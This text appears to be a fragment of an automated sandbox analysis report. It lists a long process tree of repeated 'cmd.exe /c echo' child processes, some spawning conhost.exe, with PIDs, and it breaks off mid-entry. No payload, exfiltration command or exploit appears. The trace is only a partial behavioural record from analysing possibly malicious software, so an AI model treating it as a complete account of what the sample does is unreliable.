- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:848
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1168
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4372
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:640
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2036
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1288
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5064
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4036
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2304
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4736
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:952
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2360
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2752
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4384
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3960
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4588
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3128
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3124
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4904
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4824
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3392
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4424
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1376
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2836
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3048
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4320
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4988
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:8
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4064
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4456
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2360
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1576
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4384
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4892
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3820
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:404
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4956
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2408
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2612
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1828
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:760
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4824
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1604
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3392
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4348
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:980
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4772
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4944
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:232
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4404
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5028
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3232
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2664
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2768
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3196
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3936
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2676
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2856
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1576
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3960
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3600
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4892
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3820
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4588
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2316
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1504
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:844
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2268
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4340
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4424
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3152
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5116
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4840
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4268
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3604
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4040
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3788
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:656
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4804
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3792
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1160
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4848
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:532
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3716
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3056
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1516
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1544
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2408
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4828
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:848
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2720
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1200
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4608
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1212
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4148
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3204
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1056
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:968
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3232
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:368
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2260
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1172
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1676
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3420
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2856
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1780
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2112
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1796
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1516
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4956
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4496
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3124
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3736
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4824
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2832
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4772
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2144
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1028
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3984
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4320
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3788
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2932
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2768
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2312
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:456
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2752
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:920
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2788
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4980
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3316
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3040
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3880
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5032
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4564
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1828
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5024
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3724
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4608
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2088
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4772
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1288
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1136
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4604
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3984
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:656
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3600
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4084
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4144
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4716
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1520
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3316
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3676
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4704
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2588
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2940
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1200
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1828
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1604
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2832
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1248
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5104
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1056
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4488
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4476
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4580
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3600
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3420
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1888
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4980
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4588
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3056
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2712
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1504
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4828
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3840
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2780
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:760
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2168
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4220
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1064
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4944
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2920
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2144
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3604
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4268
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2244
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2580
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3312
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2260
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4456
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1172
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4136
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4084
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:728
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3716
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3336
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2316
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2408
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4564
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1784
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2940
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4824
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1312
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3636
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2600
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4724
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1248
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1288
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:968
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4892
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2664
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4040
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2736
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3312
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4804
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3936
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3780
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1780
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:532
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4888
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2492
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3880
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3040
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2236
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4704
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2780
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2268
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2168
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1376
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3152
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1064
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
